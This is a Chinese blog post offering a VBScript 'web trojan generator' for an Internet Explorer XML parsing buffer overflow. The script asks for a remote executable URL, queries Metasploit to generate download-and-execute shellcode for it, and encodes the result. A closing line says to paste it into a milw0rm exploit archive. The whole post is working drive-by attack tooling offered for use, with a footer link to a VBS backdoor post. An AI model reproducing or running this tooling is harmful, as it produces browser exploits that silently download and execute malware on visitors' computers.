当前位置 博文首页 > 网马生成器 MS Internet Explorer XML Parsing Buffer Overflow

最大化 缩小

    网马生成器 MS Internet Explorer XML Parsing Buffer Overflow

    作者:admin 时间:2021-02-18 15:39

    'code by lcx

    On Error Resume Next
    Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
    url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload"


    Body = getHTTPPage(url)
    Set Re = New RegExp
    Re.Pattern = "(\$shellcode \=[\s\S]+</div></pre>)"

    Set Matches = Re.Execute(Body)
    If Matches.Count>0 Then Body = Matches(0).value

    code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))

    function replaceregex(str)
    set regex=new regExp
    regex.pattern="\\x(..)\\x(..)"
    regex.IgnoreCase=true
    regex.global=true
    matches=regex.replace(str,"%u$2$1")
    replaceregex=matches
    end Function


    Function getHTTPPage(Path)
    t = GetBody(Path)
    getHTTPPage = BytesToBstr(t, "GB2312")
    End Function

    Function GetBody(url)
    On Error Resume Next
    Set Retrieval = CreateObject("Microsoft.XMLHTTP")
    With Retrieval
    .Open "Get", url, False, "", ""
    .Send
    GetBody = .ResponseBody
    End With
    Set Retrieval = Nothing
    End Function

    Function BytesToBstr(Body, Cset)
    Dim objstream
    Set objstream = CreateObject("adodb.stream")
    objstream.Type = 1
    objstream.Mode = 3
    objstream.Open
    objstream.Write Body
    objstream.Position = 0
    objstream.Type = 2
    objstream.Charset = Cset
    BytesToBstr = objstream.ReadText
    objstream.Close
    Set objstream = Nothing
    End Function

    Function URLEncoding(vstrIn)
    strReturn = ""
    For aaaa = 1 To Len(vstrIn)
    ThisChr = Mid(vStrIn,aaaa,1)
    If Abs(Asc(ThisChr)) < &HFF Then
    strReturn = strReturn & ThisChr
    Else
    innerCode = Asc(ThisChr)
    If innerCode < 0 Then
    innerCode = innerCode + &H10000
    End If
    Hight8 = (innerCode And &HFF00)\ &HFF
    Low8 = innerCode And &HFF
    strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
    End If
    Next
    URLEncoding = strReturn
    End Function

    set fso=CreateObject("scripting.filesystemobject")
    set fileS=fso.opentextfile("a.txt",2,true)
    fileS.writeline replaceregex(code)
    'fileS.writeline body
    wscript.echo replaceregex(code)
    files.close
    set fso=Nothing

    wscript.echo Chr(13)&"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"
    js
上一篇:可自删除 开启3389创建用户粘滞键后门的vbs
下一篇:没有了